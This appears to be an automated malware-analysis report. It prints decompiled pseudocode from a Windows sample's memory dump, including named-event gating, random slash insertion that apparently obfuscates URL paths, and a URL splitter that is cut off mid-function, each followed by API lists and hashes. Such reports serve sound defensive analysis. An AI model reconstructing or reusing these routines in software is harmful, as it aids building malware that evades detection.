                                      				intOrPtr _t12;
                                      				void* _t25;
                                      				void* _t26;
                                      				signed int* _t27;
                                      				signed short* _t28;
                                      				CHAR* _t30;
                                      				long _t31;
                                      				intOrPtr* _t32;
                                      
                                      				_t6 =  *0xfad228; // 0xbd092303
                                      				_t32 = _a4;
                                      				_a4 = _t6 ^ 0xd05b5869;
                                      				_t8 =  *0xfad230; // 0x2a9a5a8
                                      				_t3 = _t8 + 0xfae84d; // 0x61636f4c: first dword of the string at that address, "Loca" in little-endian ASCII; E00FAA090 (lstrlen/lstrcpy/lstrcat, see APIs) builds the event name from it
                                      				_t25 = 0;
                                      				_t30 = E00FAA090(_t3, 1);
                                      				if(_t30 != 0) {
                                      					_t25 = CreateEventA(0xfad234, 1, 0, _t30); // (lpSecurityAttributes, bManualReset=TRUE, bInitialState=FALSE, lpName): a named manual-reset event
                                      					E00FAA07B(_t30);
                                      				}
                                      				_t12 =  *0xfad214; // 0x2000000a
                                      				if(_t12 != 6 || _t12 < 2) {
                                      					if( *_t32 != 0 && E00FA229C() == 0) {
                                      						_t28 =  *0xfad100( *_t32, 0x20); // unresolved import called as (string, 0x20): a find-character call for the first space, inferred from the split that follows (NUL-terminate at the hit, advance past it)
                                      						if(_t28 != 0) {
                                      							 *_t28 =  *_t28 & 0x00000000;
                                      							_t28 =  &(_t28[1]);
                                      						}
                                      						_t31 = E00FA8134(0, _t28,  *_t32, 0);
                                      						if(_t31 == 0) {
                                      							if(_t25 == 0) {
                                      								goto L21;
                                      							}
                                      							_t31 = WaitForSingleObject(_t25, 0x4e20); // 0x4e20 = 20000 ms
                                      							if(_t31 == 0) {
                                      								goto L19;
                                      							}
                                      						}
                                      					}
                                      					goto L11;
                                      				} else {
                                      					L11:
                                      					_t27 = _a8;
                                      					if(_t27 != 0) {
                                      						 *_t27 =  *_t27 | 0x00000001;
                                      					}
                                      					_t31 = E00FAA3FC(_t32, _t26);
                                      					if(_t31 == 0 && _t25 != 0) {
                                      						_t31 = WaitForSingleObject(_t25, 0x4e20); // 0x4e20 = 20000 ms
                                      					}
                                      					if(_t27 != 0 && _t31 != 0) {
                                      						 *_t27 =  *_t27 & 0xfffffffe;
                                      					}
                                      					L19:
                                      					if(_t25 != 0) {
                                      						CloseHandle(_t25);
                                      					}
                                      					L21:
                                      					return _t31;
                                      				}
                                      			}

                                      Instruction addresses for the pseudocode above, one per line in the report's side-by-side view and flattened by extraction: 0x00fa50b6 through 0x00fa51a5 (0x00000000 where the decompiler mapped no instruction).

                                      APIs
                                        • Part of subcall function 00FAA090: lstrlen.KERNEL32(?,00000000,00000000,00000027,E8FA7DD7,00000000,745EC740,00FA987E,74666F53,00000000,?,00000000,?,?,00FA726B), ref: 00FAA0C6
                                        • Part of subcall function 00FAA090: lstrcpy.KERNEL32(00000000,00000000), ref: 00FAA0EA
                                        • Part of subcall function 00FAA090: lstrcat.KERNEL32(00000000,00000000), ref: 00FAA0F2
                                      • CreateEventA.KERNEL32(00FAD234,00000001,00000000,00000000,61636F4C,00000001,00000000,?,?,00000000,?,00FA2649,?,?,?), ref: 00FA50F4
                                        • Part of subcall function 00FAA07B: HeapFree.KERNEL32(00000000,00000000,00FA8705,00000000,?,?,00000000,?,?,?,?,?,?,00FA2540,00000000), ref: 00FAA087
                                      • WaitForSingleObject.KERNEL32(00000000,00004E20,00FA2649,00000000,?,00000000,?,00FA2649,?,?,?,?,?,?,?,00FA9D1C), ref: 00FA5152
                                      • WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,?,?,00000000,?,00FA2649,?,?,?), ref: 00FA5180
                                      • CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,?,?,00000000,?,00FA2649,?,?,?), ref: 00FA5198
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1203041666.0000000000FA1000.00000020.00020000.sdmp, Offset: 00FA0000, based on PE: true
                                      • Associated: 00000000.00000002.1203030409.0000000000FA0000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.1203071554.0000000000FAC000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.1203083910.0000000000FAD000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.1203095235.0000000000FAF000.00000002.00020000.sdmp
                                      Similarity
                                      • API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
                                      • String ID:
                                      • API String ID: 73268831-0
                                      • Opcode ID: 3b7e19cdca46c0c3272824f1c6746e4bb8a021d364609fbbb623447281fa6580
                                      • Instruction ID: 33b324579447a64be9456fbdc561622b21ce6eb3d4c4a9abbd414b73affa1b95
                                      • Opcode Fuzzy Hash: 3b7e19cdca46c0c3272824f1c6746e4bb8a021d364609fbbb623447281fa6580
                                      • Instruction Fuzzy Hash: 2721F1F2E00B16ABD7215B689C44B6B73E9AF4BB70F054624F902DB290DB74CC05A690
                                      Uniqueness
                                      • Uniqueness Score: -1.00%

                                      C-Code - Quality: 39%
                                      			E00FA259A(void* __ecx, void* __eflags, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
                                      				intOrPtr _v12;
                                      				void* _v16;
                                      				void* _v28;
                                      				char _v32;
                                      				void* __esi;
                                      				void* _t29;
                                      				void* _t38;
                                      				signed int* _t39;
                                      				void* _t40;
                                      
                                      				_t36 = __ecx;
                                      				_v32 = 0;
                                      				asm("stosd");
                                      				asm("stosd");
                                      				asm("stosd");
                                      				asm("stosd");
                                      				asm("stosd");
                                      				_v12 = _a4;
                                      				_t38 = E00FA8E87(__ecx,  &_v32);
                                      				if(_t38 != 0) {
                                      					L12:
                                      					_t39 = _a8;
                                      					L13:
                                      					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
                                      						_t23 =  &(_t39[1]);
                                      						if(_t39[1] != 0) {
                                      							E00FA8CA3(_t23);
                                      						}
                                      					}
                                      					return _t38;
                                      				}
                                      				if(E00FA94F1(0x40,  &_v16) != 0) {
                                      					_v16 = 0;
                                      				}
                                      				_t40 = CreateEventA(0xfad234, 1, 0,  *0xfad2f0);
                                      				if(_t40 != 0) {
                                      					SetEvent(_t40);
                                      					Sleep(0xbb8);
                                      					CloseHandle(_t40);
                                      				}
                                      				_push( &_v32);
                                      				if(_a12 == 0) {
                                      					_t29 = E00FA275C(_t36);
                                      				} else {
                                      					_push(0);
                                      					_push(0);
                                      					_push(0);
                                      					_push(0);
                                      					_push(0);
                                      					_t29 = E00FA8760(_t36);
                                      				}
                                      				_t41 = _v16;
                                      				_t38 = _t29;
                                      				if(_v16 != 0) {
                                      					E00FA72B8(_t41);
                                      				}
                                      				if(_t38 != 0) {
                                      					goto L12;
                                      				} else {
                                      					_t39 = _a8;
                                      					_t38 = E00FA50B5( &_v32, _t39);
                                      					goto L13;
                                      				}
                                      			}

                                      Instruction addresses (one per decompiled statement, 0x00000000 where no address applies): 0x00fa259a, 0x00fa25a7, 0x00fa25ad, 0x00fa25ae, 0x00fa25af, 0x00fa25b0, 0x00fa25b1, 0x00fa25b5, 0x00fa25c1, 0x00fa25c5, 0x00fa264d, 0x00fa264d, 0x00fa2650, 0x00fa2652, 0x00fa265a, 0x00fa2660, 0x00fa2663, 0x00fa2663, 0x00fa2660, 0x00fa266e, 0x00fa266e, 0x00fa25d8, 0x00fa25da, 0x00fa25da, 0x00fa25f1, 0x00fa25f5, 0x00fa25f8, 0x00fa2603, 0x00fa260a, 0x00fa260a, 0x00fa2616, 0x00fa2617, 0x00fa2625, 0x00fa2619, 0x00fa2619, 0x00fa261a, 0x00fa261b, 0x00fa261c, 0x00fa261d, 0x00fa261e, 0x00fa261e, 0x00fa262a, 0x00fa262f, 0x00fa2631, 0x00fa2633, 0x00fa2633, 0x00fa263a, 0x00000000, 0x00fa263c, 0x00fa263c, 0x00fa2649, 0x00000000, 0x00fa2649

                                      APIs
                                      • CreateEventA.KERNEL32(00FAD234,00000001,00000000,00000040,?,?,73BCF710,00000000,73BCF730,?,?,?,?,00FA9D1C,?,00000001), ref: 00FA25EB
                                      • SetEvent.KERNEL32(00000000,?,?,?,?,00FA9D1C,?,00000001,00FA7299,00000002,?,?,00FA7299), ref: 00FA25F8
                                      • Sleep.KERNEL32(00000BB8,?,?,?,?,00FA9D1C,?,00000001,00FA7299,00000002,?,?,00FA7299), ref: 00FA2603
                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,00FA9D1C,?,00000001,00FA7299,00000002,?,?,00FA7299), ref: 00FA260A
                                        • Part of subcall function 00FA275C: WaitForSingleObject.KERNEL32(00000000,?,?,?,00FA262A,?,00FA262A,?,?,?,?,?,00FA262A,?), ref: 00FA2836
                                        • Part of subcall function 00FA275C: RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,?,?,?,00FA262A,?,?,?,?,?,00FA9D1C,?), ref: 00FA285E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1203041666.0000000000FA1000.00000020.00020000.sdmp, Offset: 00FA0000, based on PE: true
                                      • Associated: 00000000.00000002.1203030409.0000000000FA0000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.1203071554.0000000000FAC000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.1203083910.0000000000FAD000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.1203095235.0000000000FAF000.00000002.00020000.sdmp
                                      Similarity
                                      • API ID: CloseEvent$CreateHandleObjectSingleSleepWait
                                      • String ID:
                                      • API String ID: 467273019-0
                                      • Opcode ID: b52a3375f92544262a39544e9e2837ceec024d5f50c63e957caa0df4c5c6ae4b
                                      • Instruction ID: a2c1a9bebd85f8b8c73d72ab8fd4fdf313fe73a2155dda3afaf1dafad21d7643
                                      • Opcode Fuzzy Hash: b52a3375f92544262a39544e9e2837ceec024d5f50c63e957caa0df4c5c6ae4b
                                      • Instruction Fuzzy Hash: 3B2168F3E01219EBCB50AFE8CC859AE73B9AF46350B058425F511E7200DB74DD45EBA1
                                      Uniqueness
                                      • Uniqueness Score: -1.00%

                                      C-Code - Quality: 68%
                                      			E00FA53E6(unsigned int __eax, void* __ecx) {
                                      				void* _v8;
                                      				void* _v12;
                                      				signed int _t21;
                                      				signed short _t23;
                                      				char* _t27;
                                      				void* _t29;
                                      				void* _t30;
                                      				unsigned int _t33;
                                      				void* _t37;
                                      				unsigned int _t38;
                                      				void* _t41;
                                      				void* _t42;
                                      				int _t45;
                                      				void* _t46;
                                      
                                      				_t42 = __eax;
                                      				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
                                      				_t38 = __eax;
                                      				_t30 = RtlAllocateHeap( *0xfad1f0, 0, (__eax >> 3) + __eax + 1);
                                      				_v12 = _t30;
                                      				if(_t30 != 0) {
                                      					_v8 = _t42;
                                      					do {
                                      						_t33 = 0x18;
                                      						if(_t38 <= _t33) {
                                      							_t33 = _t38;
                                      						}
                                      						_t21 =  *0xfad208; // 0x62730d45
                                      						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
                                      						 *0xfad208 = _t23;
                                      						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
                                      						memcpy(_t30, _v8, _t45);
                                      						_v8 = _v8 + _t45;
                                      						_t27 = _t30 + _t45;
                                      						_t38 = _t38 - _t45;
                                      						_t46 = _t46 + 0xc;
                                      						 *_t27 = 0x2f;
                                      						_t13 = _t27 + 1; // 0x1
                                      						_t30 = _t13;
                                      					} while (_t38 > 8);
                                      					memcpy(_t30, _v8, _t38 + 1);
                                      				}
                                      				return _v12;
                                      			}

                                      Instruction addresses (one per decompiled statement): 0x00fa53ee, 0x00fa53f1, 0x00fa53f7, 0x00fa540f, 0x00fa5413, 0x00fa5416, 0x00fa5418, 0x00fa541b, 0x00fa541d, 0x00fa5420, 0x00fa5422, 0x00fa5422, 0x00fa5424, 0x00fa542f, 0x00fa5434, 0x00fa5445, 0x00fa544d, 0x00fa5452, 0x00fa5455, 0x00fa5458, 0x00fa545a, 0x00fa5460, 0x00fa5463, 0x00fa5463, 0x00fa5463, 0x00fa546e, 0x00fa5473, 0x00fa547d

                                      APIs
                                      • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00FA4A7F,00000000,?,00000000,00FA3E0F,00000000,03A49630), ref: 00FA53F1
                                      • RtlAllocateHeap.NTDLL(00000000,?), ref: 00FA5409
                                      • memcpy.NTDLL(00000000,03A49630,-00000008,?,?,?,00FA4A7F,00000000,?,00000000,00FA3E0F,00000000,03A49630), ref: 00FA544D
                                      • memcpy.NTDLL(00000001,03A49630,00000001,00FA3E0F,00000000,03A49630), ref: 00FA546E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1203041666.0000000000FA1000.00000020.00020000.sdmp, Offset: 00FA0000, based on PE: true
                                      • Associated: 00000000.00000002.1203030409.0000000000FA0000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.1203071554.0000000000FAC000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.1203083910.0000000000FAD000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.1203095235.0000000000FAF000.00000002.00020000.sdmp
                                      Similarity
                                      • API ID: memcpy$AllocateHeaplstrlen
                                      • String ID:
                                      • API String ID: 1819133394-0
                                      • Opcode ID: 4c8aec98c5bd665e8d9e4ee94f4a1041b24d964a0ba7a8f9f451e45a48987681
                                      • Instruction ID: f2a481873453a3dfe8d86430be73e140f169e02d33549172beb06cafe400bbab
                                      • Opcode Fuzzy Hash: 4c8aec98c5bd665e8d9e4ee94f4a1041b24d964a0ba7a8f9f451e45a48987681
                                      • Instruction Fuzzy Hash: 3F1136B2A00218ABD710DB69DC88E9EBBEEDB86360B144276F805C7150E6709E00E7A0
                                      Uniqueness
                                      • Uniqueness Score: -1.00%

                                      C-Code - Quality: 53%
                                      			E00FA83FE(char* __eax) {
                                      				char* _t8;
                                      				intOrPtr _t12;
                                      				char* _t21;
                                      				signed int _t23;
                                      				char* _t24;
                                      				signed int _t26;
                                      				void* _t27;
                                      
                                      				_t21 = __eax;
                                      				_push(0x20);
                                      				_t23 = 1;
                                      				_push(__eax);
                                      				while(1) {
                                      					_t8 = StrChrA();
                                      					if(_t8 == 0) {
                                      						break;
                                      					}
                                      					_t23 = _t23 + 1;
                                      					_push(0x20);
                                      					_push( &(_t8[1]));
                                      				}
                                      				_t12 = E00FA550F(_t23 << 2);
                                      				 *((intOrPtr*)(_t27 + 0x10)) = _t12;
                                      				if(_t12 != 0) {
                                      					StrTrimA(_t21, 0xfac2bc);
                                      					_t26 = 0;
                                      					do {
                                      						_t24 = StrChrA(_t21, 0x20);
                                      						if(_t24 != 0) {
                                      							 *_t24 = 0;
                                      							_t24 =  &(_t24[1]);
                                      							StrTrimA(_t24, 0xfac2bc);
                                      						}
                                      						 *( *((intOrPtr*)(_t27 + 0x10)) + _t26 * 4) = _t21;
                                      						_t26 = _t26 + 1;
                                      						_t21 = _t24;
                                      					} while (_t24 != 0);
                                      					 *((intOrPtr*)( *((intOrPtr*)(_t27 + 0x18)))) =  *((intOrPtr*)(_t27 + 0x10));
                                      				}
                                      				return 0;
                                      			}

                                      Instruction addresses (one per decompiled statement, 0x00000000 where no address applies): 0x00fa8409, 0x00fa840d, 0x00fa840f, 0x00fa8410, 0x00fa8418, 0x00fa8418, 0x00fa841c, 0x00000000, 0x00000000, 0x00fa8413, 0x00fa8414, 0x00fa8417, 0x00fa8417, 0x00fa8424, 0x00fa842b, 0x00fa842f, 0x00fa8437, 0x00fa843d, 0x00fa843f, 0x00fa8444, 0x00fa8448, 0x00fa844a, 0x00fa844d, 0x00fa8454, 0x00fa8454, 0x00fa845e, 0x00fa8461, 0x00fa8464, 0x00fa8464, 0x00fa8470, 0x00fa8470, 0x00fa847d

                                      APIs
                                      • StrChrA.SHLWAPI(?,00000020,00000000,03A4962C,?,?,?,00FAA34D,03A4962C,?,?,00FA7260), ref: 00FA8418
                                      • StrTrimA.SHLWAPI(?,00FAC2BC,00000002,?,?,?,00FAA34D,03A4962C,?,?,00FA7260), ref: 00FA8437
                                      • StrChrA.SHLWAPI(?,00000020,?,?,?,00FAA34D,03A4962C,?,?,00FA7260,?,?,?,?,?,00FA258B), ref: 00FA8442
                                      • StrTrimA.SHLWAPI(00000001,00FAC2BC,?,?,?,00FAA34D,03A4962C,?,?,00FA7260,?,?,?,?,?,00FA258B), ref: 00FA8454
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1203041666.0000000000FA1000.00000020.00020000.sdmp, Offset: 00FA0000, based on PE: true
                                      • Associated: 00000000.00000002.1203030409.0000000000FA0000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.1203071554.0000000000FAC000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.1203083910.0000000000FAD000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.1203095235.0000000000FAF000.00000002.00020000.sdmp
                                      Similarity
                                      • API ID: Trim
                                      • String ID:
                                      • API String ID: 3043112668-0
                                      • Opcode ID: 308d854354e53fc911953270ac5cd261db95434bd470b3db677565ef78b8db93
                                      • Instruction ID: d1ef256614e681c475d0f8ee3c53665e2adf90eaf00e82b52d0449176ab2bbe0
                                      • Opcode Fuzzy Hash: 308d854354e53fc911953270ac5cd261db95434bd470b3db677565ef78b8db93
                                      • Instruction Fuzzy Hash: 5D0156B1A053165FD221DF559C49B2B7E98FF8B7A0F110519FD45D7241EBA4CC02A2E1
                                      Uniqueness
                                      • Uniqueness Score: -1.00%

                                      C-Code - Quality: 53%
                                      			E00FAA090(intOrPtr _a4, intOrPtr _a8) {
                                      				char _v20;
                                      				void* _t8;
                                      				void* _t13;
                                      				void* _t16;
                                      				char* _t18;
                                      				void* _t19;
                                      
                                      				_t19 = 0x27;
                                      				_t1 =  &_v20; // 0x74666f53
                                      				_t18 = 0;
                                      				E00FA9067(_t8, _t1);
                                      				_t16 = E00FA550F(_t19);
                                      				if(_t16 != 0) {
                                      					_t3 =  &_v20; // 0x74666f53
                                      					_t13 = E00FA8228(_t3, _t16, _a8);
                                      					if(_a4 != 0) {
                                      						__imp__(_a4);
                                      						_t19 = _t13 + 0x27;
                                      					}
                                      					_t18 = E00FA550F(_t19);
                                      					if(_t18 != 0) {
                                      						 *_t18 = 0;
                                      						if(_a4 != 0) {
                                      							__imp__(_t18, _a4);
                                      						}
                                      						__imp__(_t18, _t16);
                                      					}
                                      					E00FAA07B(_t16);
                                      				}
                                      				return _t18;
                                      			}

                                      Instruction addresses (one per decompiled statement): 0x00faa09b, 0x00faa09c, 0x00faa09f, 0x00faa0a1, 0x00faa0ac, 0x00faa0b0, 0x00faa0b5, 0x00faa0b9, 0x00faa0c1, 0x00faa0c6, 0x00faa0ce, 0x00faa0ce, 0x00faa0d7, 0x00faa0db, 0x00faa0e1, 0x00faa0e4, 0x00faa0ea, 0x00faa0ea, 0x00faa0f2, 0x00faa0f2, 0x00faa0f9, 0x00faa0f9, 0x00faa104

                                      APIs
                                        • Part of subcall function 00FA550F: RtlAllocateHeap.NTDLL(00000000,00000000,00FA863D), ref: 00FA551B
                                        • Part of subcall function 00FA8228: wsprintfA.USER32 ref: 00FA8284
                                      • lstrlen.KERNEL32(?,00000000,00000000,00000027,E8FA7DD7,00000000,745EC740,00FA987E,74666F53,00000000,?,00000000,?,?,00FA726B), ref: 00FAA0C6
                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 00FAA0EA
                                      • lstrcat.KERNEL32(00000000,00000000), ref: 00FAA0F2
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1203041666.0000000000FA1000.00000020.00020000.sdmp, Offset: 00FA0000, based on PE: true
                                      • Associated: 00000000.00000002.1203030409.0000000000FA0000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.1203071554.0000000000FAC000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.1203083910.0000000000FAD000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.1203095235.0000000000FAF000.00000002.00020000.sdmp
                                      Similarity
                                      • API ID: AllocateHeaplstrcatlstrcpylstrlenwsprintf
                                      • String ID: Soft
                                      • API String ID: 393707159-3753413193
                                      • Opcode ID: cb9155451aa8025f730f13f679ed45507ddd4403077b6f4bec0f77ada7df389c
                                      • Instruction ID: 9e810c54c42350f4d82fb62a919af54c7b3c753b22f1dc053efcfe66da641466
                                      • Opcode Fuzzy Hash: cb9155451aa8025f730f13f679ed45507ddd4403077b6f4bec0f77ada7df389c
                                      • Instruction Fuzzy Hash: AE01D6B250060ABBCB127BB89C84AEF3BAD9F87755F04C020F90595101DF78C989E7E2
                                      Uniqueness
                                      • Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E00FA4ACE() {
                                      				void* _t1;
                                      				intOrPtr _t5;
                                      				void* _t6;
                                      				void* _t7;
                                      				void* _t11;
                                      
                                      				_t1 =  *0xfad224; // 0x298
                                      				if(_t1 == 0) {
                                      					L8:
                                      					return 0;
                                      				}
                                      				SetEvent(_t1);
                                      				_t11 = 0x7fffffff;
                                      				while(1) {
                                      					SleepEx(0x64, 1);
                                      					_t5 =  *0xfad264; // 0x0
                                      					if(_t5 == 0) {
                                      						break;
                                      					}
                                      					_t11 = _t11 - 0x64;
                                      					if(_t11 > 0) {
                                      						continue;
                                      					}
                                      					break;
                                      				}
                                      				_t6 =  *0xfad224; // 0x298
                                      				if(_t6 != 0) {
                                      					CloseHandle(_t6);
                                      				}
                                      				_t7 =  *0xfad1f0; // 0x3650000
                                      				if(_t7 != 0) {
                                      					HeapDestroy(_t7);
                                      				}
                                      				goto L8;
                                      			}

                                      Instruction addresses (one per decompiled statement, 0x00000000 where no address applies): 0x00fa4ace, 0x00fa4ad5, 0x00fa4b1f, 0x00fa4b21, 0x00fa4b21, 0x00fa4ad9, 0x00fa4adf, 0x00fa4ae4, 0x00fa4ae8, 0x00fa4aee, 0x00fa4af5, 0x00000000, 0x00000000, 0x00fa4af7, 0x00fa4afc, 0x00000000, 0x00000000, 0x00000000, 0x00fa4afc, 0x00fa4afe, 0x00fa4b06, 0x00fa4b09, 0x00fa4b09, 0x00fa4b0f, 0x00fa4b16, 0x00fa4b19, 0x00fa4b19, 0x00000000

                                      APIs
                                      • SetEvent.KERNEL32(00000298,00000001,00FAA580), ref: 00FA4AD9
                                      • SleepEx.KERNEL32(00000064,00000001), ref: 00FA4AE8
                                      • CloseHandle.KERNEL32(00000298), ref: 00FA4B09
                                      • HeapDestroy.KERNEL32(03650000), ref: 00FA4B19
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1203041666.0000000000FA1000.00000020.00020000.sdmp, Offset: 00FA0000, based on PE: true
                                       • Associated: 00000000.00000002.1203030409.0000000000FA0000.00000004.00020000.sdmp
                                       • Associated: 00000000.00000002.1203071554.0000000000FAC000.00000002.00020000.sdmp
                                       • Associated: 00000000.00000002.1203083910.0000000000FAD000.00000004.00020000.sdmp
                                       • Associated: 00000000.00000002.1203095235.0000000000FAF000.00000002.00020000.sdmp
                                      Similarity
                                      • API ID: CloseDestroyEventHandleHeapSleep
                                      • String ID:
                                      • API String ID: 4109453060-0
                                      • Opcode ID: 01ddd44e86983925fbb506eaee42202db2b1bd29205a15ca5d46df397d65174d
                                      • Instruction ID: 1f555a964efebd6ba54d4dd80e8f621ecb96f2f4f4a1f0ec344837d9581dbec7
                                      • Opcode Fuzzy Hash: 01ddd44e86983925fbb506eaee42202db2b1bd29205a15ca5d46df397d65174d
                                      • Instruction Fuzzy Hash: 53F01CF1B002199BE7209B78AD08B0637DCAB86BA17054110B901D35A4DAA0E800F9B0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 50%
                                       			E00FAA302(void** __esi) {
                                       				char* _v0;
                                       				intOrPtr _t4;
                                       				intOrPtr _t6;
                                       				void* _t8;
                                       				intOrPtr _t11;
                                       				void* _t12;
                                       				void** _t14;
                                       
                                       				_t14 = __esi;
                                       				_t4 =  *0xfad2d4; // 0x3a49630 - global context structure
                                       				__imp__(_t4 + 0x40); // RtlEnterCriticalSection on the lock embedded in the context
                                       				while(1) {
                                       					_t6 =  *0xfad2d4; // 0x3a49630
                                       					_t1 = _t6 + 0x58; // 0x0 - "busy" flag; spin in 10 ms steps until it clears
                                       					if( *_t1 == 0) {
                                       						break;
                                       					}
                                       					Sleep(0xa);
                                       				}
                                       				_t8 =  *_t14;
                                       				if(_t8 != 0 && _t8 != 0xfad030) { // never free the compiled-in default at 0xfad030 (inside the image)
                                       					HeapFree( *0xfad1f0, 0, _t8); // release the old buffer from the private heap
                                       				}
                                       				_t14[1] = E00FA83FE(_v0, _t14); // store the replacement produced by E00FA83FE
                                       				_t11 =  *0xfad2d4; // 0x3a49630
                                       				_t12 = _t11 + 0x40;
                                       				__imp__(_t12); // RtlLeaveCriticalSection
                                       				return _t12;
                                       			}

                                       Instruction addresses for the lines above (one per decompiled line; column alignment lost in extraction): 0x00faa302 to 0x00faa35f.

                                      APIs
                                      • RtlEnterCriticalSection.NTDLL(03A495F0), ref: 00FAA30B
                                      • Sleep.KERNEL32(0000000A,?,?,00FA7260,?,?,?,?,?,00FA258B,?,00000001), ref: 00FAA315
                                      • HeapFree.KERNEL32(00000000,00000000,?,?,00FA7260,?,?,?,?,?,00FA258B,?,00000001), ref: 00FAA33D
                                      • RtlLeaveCriticalSection.NTDLL(03A495F0), ref: 00FAA359
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1203041666.0000000000FA1000.00000020.00020000.sdmp, Offset: 00FA0000, based on PE: true
                                       • Associated: 00000000.00000002.1203030409.0000000000FA0000.00000004.00020000.sdmp
                                       • Associated: 00000000.00000002.1203071554.0000000000FAC000.00000002.00020000.sdmp
                                       • Associated: 00000000.00000002.1203083910.0000000000FAD000.00000004.00020000.sdmp
                                       • Associated: 00000000.00000002.1203095235.0000000000FAF000.00000002.00020000.sdmp
                                      Similarity
                                      • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                      • String ID:
                                      • API String ID: 58946197-0
                                      • Opcode ID: a53ffb7b8757e1b7f2a2ba75b6dfcd82e9d236a1d6abece5827caccabcdf48bd
                                      • Instruction ID: 142c5dcd590901ee7a0448176ed29a49219c24860490149db9f1258997e72e61
                                      • Opcode Fuzzy Hash: a53ffb7b8757e1b7f2a2ba75b6dfcd82e9d236a1d6abece5827caccabcdf48bd
                                      • Instruction Fuzzy Hash: DCF0F2F5611345DBEB209F69ED48F1A37A8AF03745B048404F486CB661C734EC01FBA6
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 37%
                                       			E00FA6BB2() {
                                       				void* _v0;
                                       				void** _t3;
                                       				void** _t5;
                                       				void** _t7;
                                       				void** _t8;
                                       				void* _t10;
                                       
                                       				_t3 =  *0xfad2d4; // 0x3a49630 - global context structure
                                       				__imp__( &(_t3[0x10])); // RtlEnterCriticalSection on the lock at context+0x40
                                       				while(1) {
                                       					_t5 =  *0xfad2d4; // 0x3a49630
                                       					_t1 =  &(_t5[0x16]); // 0x0 - "busy" flag at context+0x58; spin in 10 ms steps until it clears
                                       					if( *_t1 == 0) {
                                       						break;
                                       					}
                                       					Sleep(0xa);
                                       				}
                                       				_t7 =  *0xfad2d4; // 0x3a49630
                                       				_t10 =  *_t7;
                                       				if(_t10 != 0 && _t10 != 0xfae882) { // never free the compiled-in default at 0xfae882 (inside the image)
                                       					HeapFree( *0xfad1f0, 0, _t10); // release the old buffer from the private heap
                                       					_t7 =  *0xfad2d4; // 0x3a49630
                                       				}
                                       				 *_t7 = _v0; // install the caller-supplied replacement as the first pointer in the context
                                       				_t8 =  &(_t7[0x10]);
                                       				__imp__(_t8); // RtlLeaveCriticalSection
                                       				return _t8;
                                       			}

                                       Instruction addresses for the lines above (one per decompiled line; column alignment lost in extraction): 0x00fa6bb2 to 0x00fa6c0e.

                                      APIs
                                      • RtlEnterCriticalSection.NTDLL(03A495F0), ref: 00FA6BBB
                                      • Sleep.KERNEL32(0000000A,?,?,00FA7260,?,?,?,?,?,00FA258B,?,00000001), ref: 00FA6BC5
                                      • HeapFree.KERNEL32(00000000,?,?,?,00FA7260,?,?,?,?,?,00FA258B,?,00000001), ref: 00FA6BF3
                                      • RtlLeaveCriticalSection.NTDLL(03A495F0), ref: 00FA6C08
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1203041666.0000000000FA1000.00000020.00020000.sdmp, Offset: 00FA0000, based on PE: true
                                       • Associated: 00000000.00000002.1203030409.0000000000FA0000.00000004.00020000.sdmp
                                       • Associated: 00000000.00000002.1203071554.0000000000FAC000.00000002.00020000.sdmp
                                       • Associated: 00000000.00000002.1203083910.0000000000FAD000.00000004.00020000.sdmp
                                       • Associated: 00000000.00000002.1203095235.0000000000FAF000.00000002.00020000.sdmp
                                      Similarity
                                      • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                      • String ID:
                                      • API String ID: 58946197-0
                                      • Opcode ID: 25341239371a77441e1b47187316ef5f29dbca772a8521b1014ac65417f83472
                                      • Instruction ID: a02165471c72e058b584451b3439e6711c2ceeaae75d43e091c84b2802d15674
                                      • Opcode Fuzzy Hash: 25341239371a77441e1b47187316ef5f29dbca772a8521b1014ac65417f83472
                                      • Instruction Fuzzy Hash: 98F0D4F460120AEFE7188B29DD89F2937A4AB46780B084418E443C7770C634EC01FB70
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 58%
                                       			// Splits the URL in _a4 into a host part (*_a8) and a path part (*_a12), both heap-allocated.
                                       			E00FAA586(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
                                       				intOrPtr* _v8;
                                       				void* _t17;
                                       				intOrPtr* _t22;
                                       				void* _t27;
                                       				char* _t30;
                                       				void* _t33;
                                       				void* _t34;
                                       				void* _t36;
                                       				void* _t37;
